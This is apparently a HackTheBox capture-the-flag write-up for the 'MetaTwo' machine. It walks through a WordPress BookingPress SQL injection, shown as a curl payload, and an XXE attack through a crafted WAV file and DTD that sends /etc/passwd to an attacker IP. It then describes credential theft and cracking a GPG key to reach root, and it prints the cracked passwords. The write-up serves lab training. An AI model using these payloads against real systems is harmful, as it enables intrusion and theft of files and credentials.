HackTheBox - MetaTwo

Author: Nauten

Web

Opening IP redirect to metapress.htb

Adding the hostname to /etc/hosts and opening the page again

From Proxy log we can check it look like an wordpress site

WP site?

We see the version to be 1.0.10

Following the instruction we can find the nonce and exploit the SQLi

https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357
We can grab the nonce

curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
  --data 'action=bookingpress_front_get_category_services&_wpnonce=5a815c3989&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'

Using the sqli we can dump the wp_users table and get all the password for user manager

After dumping the db we get a password as partylikearockstar

After login we see we can upload media

Going to the wpscan again we see we can exploit

https://github.com/motikan2010/CVE-2021-29447

We create a evil file

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.14.36:9999/?p=%file;'>" >

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.14.13:8888/lfi.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

With this we grab ../wp-config.php file which contained the ftp creds

on ftp we can get send_mailer.php

and we get user creds

Privilege Escalation

In ~/.passpie folder we find a private gpg key

cracking the password with john we get the password as blink182

Trying to export it we get an error

trying to copy root.pass and using passpie export to export it we the creds for root

and we get root